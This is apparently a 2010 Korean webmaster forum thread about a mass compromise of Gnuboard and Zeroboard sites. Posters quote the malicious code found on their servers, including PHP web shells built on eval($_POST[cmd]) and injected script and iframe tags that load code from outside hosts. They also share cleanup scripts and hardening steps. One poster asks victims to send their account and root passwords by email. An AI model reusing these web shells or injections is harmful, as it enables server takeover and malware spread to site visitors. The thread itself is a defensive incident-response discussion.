아 제 홈페이지만 그런게 아니군요. 저도 그동안 모든 업데이트패치를 다 해서 가장 최신버전의 그누보드를 사용하고 있습니다. 저는 카페24가 아니라 호스트먼트사에서 서버호스팅을 받고 있는데 24일,25일 양일 해킹이 되어 일부회원들에게 악성코드를 유포시켰고 결국 구글크롬이나 파이어폭스에서 악성코드가 있는 홈페이지라고 해서 현재는 접근을 안시켜줍니다. 일단 호스트먼트사의 관리자가 data/cheditor4 안과 data/file/게시판이름/에서 악성코드php파일들을 발견해 삭제했고 또 data폴더안에 php파일업로드안되게 서버설정을 수정했다 하는데 이로서 문제가 해결된건지는 아직 모르겠습니다.

좀 오래전이긴 하지만, XSS 크로스사이트 스크립트 관련해서 문제가 있던적이 있었습니다.
2010년4월이니깐 약 8개월이 지났네요. 그뒤로는 문제가 발생하지 않더라구요.
그누보드라서 유독 그런건 아니라고 생각됩니다만..
혹시라도 도움이 되실지 모르겠네요.

http://l2zeo.com/it/96?category=24

ps. 절대 블로그 홍보 아닙니다;

저역시 3일째 버벅 대고 있습니다..cafe24에선 계속 이전 복구만 해주는데..문제의 해결은 보이지 않습니다..

Pc 검사부터 하세요 이거 ftp 타고 들어가는걸껄요

살펴본바 여러 사이트에서 이와 같은 감염이 있었다는 것을 확인할 수 있었습니다.
그누보드만의 문제로 보여지지는 않습니다.
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ro521.com/&client=googlechrome&hl=ko

l2zeo 님의 말씀처럼 구글 웹마스터 도구등을 사용하여 사이트 검토를 요청해 보시기 바랍니다.

만약, 그누보드의 문제로 인하여 특정 코드가 삽입되었다면 해당 코드가 삽입되지 못하도록 하는 코드를 제공하도록 하겠습니다.
개별적으로 문제 해결은 해드리지 못하는 점 양해 바랍니다.

크리마스이브부터 악성코드때문에 밤도 제대로 자지 못했습니다.
분석결과 그누보드 게시판 data/file/게시판이름/  에 이상한 파일이 들어가 있는것을 발견
파일이름: visitLog.php 2010_.php
visitLog.php내용은 다음과 같습니다.
<?ob_start();?><script src=http://www.geto.co.kr/state/x.js></script>
<?php eval($_POST[cmd]);?>
visitLog.php파일이 먼저 생성되고 2010_.php파일이 생성되였는데 2010_.php파일은 웹쉘파일이였습니다. 아시다싶이 웹셀은 서버자체가 통채로 공제당하는것이라 뒤문이 펑 뚤린것과 마찬가지지요.
로그분석으로 아이피를 추적해보았는데 해당 아이피는 211.238.12.90(한국)  123.114.104.183(중국) 이였습니다.
이틀간 문을 닫고 뚜져보았는데 여기에서 제일 무서운것은 웹셀인데 교묘하게 이름을 바꾸어서 사이트 이곳저곳에 심어놓아서 파일 하나하나 애디터로 열어서 체크해야 찾아낼수 있습니다.웹셀이 살아있는한 악성코드를 삭제하더라도 간단하게 새로운 코드를 심어놓을수 있습니다.
그리고 이상한 코드가 들어있는 파일도 발견하였습니다. -  data/help.php
<?ob_start();?><script src=http://www.geto.co.kr/state/x.js></script>
<?php
preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'($_POST[cmd])','a');
?>
이 코드는 여러개 파일에서 발견하였는데 211.238.12.90 아이피가 해당 파일에 액세스 한 기록을 로그에서 찾을수 있었습니다.
이상 참고를 해 주시기 바랍니다.

아... 저도 ro521.com/test.html 아이프레임으로 들어와서 곤혹중이네요. 어디에 숨어있나요.
찾질 못하겠네요...-_-;

g4_board 테이블의 bo_content_head 에 스크립트가 삽입되네요.
마이위트도 당했구요.. ㅜㅜ 원인 분석중입니다.
일단 스크립트 제거 mysql 쿼리 입니다.

UPDATE `g4_board` SET bo_content_head = replace( bo_content_head, '<iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>', '' ) ;

common.php 의

    if ($tmp_mb_id = get_cookie("ck_mb_id"))
    {
        // **************************************
        // 이 코드가 포함되어 있는지 확인 바랍니다.
        $tmp_mb_id = substr(preg_replace("/[^a-zA-Z0-9_]*/", "", $tmp_mb_id), 0, 20);
        // **************************************
       
        // 최고관리자는 자동로그인 금지
        if ($tmp_mb_id != $config['cf_admin'])

네, 포함되어 있어요.

서버 열어주시면 좀 더 잡기가 수월해요.
잘 안되시면 *** 개인정보보호를 위한 이메일주소 노출방지 *** 로
계정, root 다 알려주세요.

grep -r  "http://www.ro521.com/test.htm"  * 으로 검사하면 HTML,php, inc 등 이미지 파일,플래쉬파일도 감염되어 나옵니다. 지금 현재 저도 html 문서나 php , inc (텍스트 문서)는 거의 해결 되어 가는데 이미지 파일 및 플래쉬 파일 헥스로 수정하고 있습니다. TT 생노가다..
저는 제로보드에서 걸렸음 아마 크리스마스 선물 갔네요 TT;

cafe24에 조치해준겁니다.
참고하세요..
일단 최신버젼으로 업글하시고
그누보드 sql injection 취약점을 통한 해킹방지를 위해 아래 작업을 진행 해 주시기 바랍니다.
1. 그누보드 업로드 디렉토리에 php 실행 차단을 꼭 설정해 주십시오.
  php_value engine off 를 .htaccess 로 생성하여 그누보드가 설치된 디렉토리 내 data/file/ 에 추가합니다.
  (주의 : 파일 이름은 글자 그대로 .htaccess 이며, 확장자가 없습니다.)
  입력내용 => php_value engine off
  파일위치 => data/file/.htaccess
고객님의 계정은 이미 설정해두었습니다.
2. 그누보드 관리자 계정 모두 비번 15자(영,숫자 포함) 이상으로 변경해주시고, 관리자 권한을
가진 계정을 최소화 해주시기 바랍니다.
현재 여러 해킹 사이트에서 그누보드 관리자의 암호를 풀 수 있는 크랙툴이 유포되고 있습니다.

권한수정 하세여 777 이며 100프로 감염 되어다고 생각하세요..
777 ->644 변경하세요

현재 저도 수정중에 있는데 백본이 있어서 비교하면서 작업중인데...
권한이 777 있는것은 거의 다 걸려 있음 ..TT

모든 폴더를 644로 변경해도 괜찮은 건가요?

저희는 한싸이트에서 문제 발생되어 완료 되었습니다.^^; 다른 사이트 점검 들어가봐야 할듯..^^'

위의 여러 귀한 조언들 감사합니다... 후아... -_-; 일단 곱슬최씨님 말씀대로 DB에 박혀있는 것을 빼니 해결된 것 같은데, 다른 부분도 점검해보고, 다른 싸이트들에 안들어오도록 다 조취를 취해야겠네요...
여튼 이렇게 귀한 공동체 나눔이 있어서 고비를 넘깁니다... 다들 감사해요. 귀한 연말 연시 되시길 소망드립니다... :) 읏샤 읏샤!!!

한국인터넷진흥원에서 메일이와서 알았는데 내문제만이 아니네요.

저도 새벽부터 침투를 받았는데 저녁에야 알고
부랴부랴 질답게시판에 올렸다가 답변에 올린 이 글 링크 따라 왔네요.
일단 급한 불은 껐습니다만 아직 불안한 마음뿐이에요.
그래도 많은 분들이 힘을 모아 주시니 고맙고 든든합니다.
모두들 새해 복 많이 받으세요.^^

sql log 남겨두신 분 없나요?
injection일 수도 있을 것 같습니다.

팁게에 소소하게 올렸는데
며칠 전에 운영중인 사이트에
$write_table 변수를 통한 SQL injection 공격이 있었습니다

관리자 권한을 가진 ID 정보를 SELECT 해서 가져가보는 녀석인데요.

인젝션은 되는데 Blind SQL Injection 처럼 막 때려보던 수준이라
DB 느려진 것 이외에 큰 피해는 없었습니다.

http://sir.co.kr/bbs/board.php?bo_table=g4_tiptech&wr_id=25255

아 피해상항 위에 댓글 다신 부분 자세히 보니까
SQL injection 이 시작이었다기 보다는
FTP나 파일업로드 취약점 등이 더 원인에 가까울거같네요

저는 이번에 그누보드것은 괜찮았는데 zeroboard것이 피해를 입었습니다.
며칠 script짜느라고 고생좀 했죠.
zeroboard의 취약성을 타고 심어진것인데 다음과 같은 코드가 hml, 이미지 할것없이 화일 끝에 첨가되었습니다.
다행히 데이타베이스는 깨끗합니다.
다음 script로 화일을 원상복귀했습니다.

작업을 위해 linux shell과 perl, sed가 필요합니다.

첨가된 악성코드는 s/ 다음부터 //g 사이 입니다. /는 \로 escape 했습니다.
sed를 이용하여 악성코드를 없앴니다. (sed -i -f pattern filename)

pattern

s/<?ob_start();?><iframe src="http:\/\/www.ro521.com\/test.htm" width=0 height=0><\/iframe><?ob_start();?><iframe src="http:\
/\/www.ro521.com\/test.htm" width=0 height=0><\/iframe><?ob_start();?><script src="http:\/\/j5b.kr\/bin\/h.js"><\/script>//g

모든 디렉토리를 탐색하여 감염된 화일을 찾습니다. grep으로 찾습니다. image화일은 match라고 만나옵니다.

Replacetext.pl

sub traverse {
  my ($dir, $callback) = @_;
  my $present;

  opendir $present, $dir or return();

  for (grep { ! /^(\.|\.\.)$/ } readdir $present) {
      my $path = "$dir/$_";

      &$callback($path);
      traverse($path, $callback) if -d $path;

  }

  closedir $present;
  return();
}
sub search_pattern {
  my $file = shift;
  $output = `grep $pattern $file`;
  if (($output =~ /$pattern/) or ($output =~ /matches/)){
# use input and output same file
# use -i option
        $status = `sed -i -f /home3/twooneu8/Perl/pattern $file`;      -->위의 pattern 화일을 절대경로로 지정합니다.
#        print "Report: $status\n";
#      print "Report: found\n";
  }
  else {
#      print "[$file] :$pattern not found - $output\n";
  }
  return;
}
traverse("/home3/twooneu8/FSC", \&search_pattern);          -->지울 디렉터리를 첫번째 param에 지정합니다.

그누보드/제로보드의 문제만이 아니라 모든 사이트들이 저런 공격을 받고 있지요.. 제가 관리하느 사이트 들도 가끔씩 저런 일이 발생하는데 경로를 찾아서 막아햐 하느데 그것도 일이더군여. 잘해결하셨길 바래요.